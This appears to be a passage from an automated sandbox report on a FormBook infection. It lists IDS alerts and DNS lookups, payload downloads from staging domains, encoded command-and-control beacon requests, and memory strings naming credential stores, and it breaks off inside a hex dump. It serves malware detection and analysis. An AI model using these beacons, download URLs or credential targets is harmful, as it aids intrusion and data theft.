Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 5.78.41.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 162.241.2.92:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 64.46.102.70:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 203.161.41.205:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 34.149.87.45:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 142.250.186.147:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80

Uses dynamic DNS services

Source: unknown

DNS query: name: iwarsut775laudrye2.duckdns.org

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 203.161.41.205 203.161.41.205

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49741 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 193.25.216.165:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 104.21.62.202:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Jouse4.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Jouse1.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: avocaldoperu.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Stevns179.mix HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wWdnBiepyw166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cpanel-adminhost.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /wl3e/?8le=9XPp_0_hUrF45X&4NZpb=u9FRs1l/3N7WVHEtnJgJBUEyIl9loYtb/3fG9DNnv3HsbAs5xmFcUO6EM9RRI1jF/q0HVxbcL2MkMMmvcW5YUJkmw7Lrsqc/ATJs0+pJV6RdOfO8AGIDWzk= HTTP/1.1Host: www.ctorq.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jk4m/?4NZpb=GUbDm7vhfGe5MI1hk+qNJ1nQn6RZkZkkMfGgtAoj7zo9jqV57hXCm6s7aYz/Z+0EslxQi0y3O+dnDNMQysbhSeS5MuaEHPD+8ZVYT7y9H4ZRkIhDdz/3BfM=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.vendasnaweb1.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /hxac/?8le=9XPp_0_hUrF45X&4NZpb=wllhn08WkHjd+gPBZYdKI+Wub1CXtIyBM4enHvEIvHUTkTToN320udwR7cLzIMMwTNDWywCtYc+R0ImolTn3KMGu+XweR0RV6KIox9Z26IjagLFeiEZ18o4= HTTP/1.1Host: www.411divorce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4d31/?4NZpb=44ZJRM6AgTVPkKil+kd2ECDljiAinZzthaG9nSTHLei+l0aw1OTq0hHH0sOZCGiiVCJZfD2Z+hB7dvZEWwWKI/qJszR12iWSsaxd9ZNP8Jsr6UPfm6Ca5qI=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.gtprivatewealth.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7qad/?8le=9XPp_0_hUrF45X&4NZpb=dYORqrGPl6AcSXgEwgocZknilcNUJSfM/+S50qW66GlmVgNZNuPxURDbCEwQ3kacCSCgEPZE3S2FpF+/JDcjyCmKfw+KdJsCQKHf2KgYBqirYhXsdXIYoQE= HTTP/1.1Host: www.katasoo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.martinminorgroup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1Host: www.atlpicsstudios.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ehr0/?4NZpb=Ihx0gjzggpHnpfOGfxSnw6gJ5cOueV8x4eE1b1b3I+S/q3zjJWKl4z1sGY5aRiTkrNYY7Ux0aZSu93Is89zAj/+h+kKnKfyF/eA8fKZfI/46sMZqkqzIHBU=&8le=9XPp_0_hUrF45X HTTP/1.1Host: www.openhandedvision.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r9e8/?8le=9XPp_0_hUrF45X&4NZpb=NZnCwFpZhKq0sQLr3EYC0TyIV0Vt7qzpk8sJXmG0u+Dj16JHvnRy3RCRxkJB+yK1MPAIrV8029hJ5TdoPi+z2c1Lq4bOeIsIUJHbQyiTQ7hpVCcnWmpKoKk= HTTP/1.1Host: www.shabygreen.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000011.00000003.2266618350.0000000003719000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2267743806.0000000003719000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: avocaldoperu.com
Source: global traffic	DNS traffic detected: DNS query: iwarsut775laudrye2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: cpanel-adminhost.com
Source: global traffic	DNS traffic detected: DNS query: www.ctorq.net
Source: global traffic	DNS traffic detected: DNS query: www.vendasnaweb1.com
Source: global traffic	DNS traffic detected: DNS query: www.411divorce.com
Source: global traffic	DNS traffic detected: DNS query: www.gtprivatewealth.com
Source: global traffic	DNS traffic detected: DNS query: www.katasoo.com
Source: global traffic	DNS traffic detected: DNS query: www.martinminorgroup.com
Source: global traffic	DNS traffic detected: DNS query: www.atlpicsstudios.com
Source: global traffic	DNS traffic detected: DNS query: www.openhandedvision.com
Source: global traffic	DNS traffic detected: DNS query: www.shabygreen.top
Source: global traffic	DNS traffic detected: DNS query: www.kera333.org

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:24 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 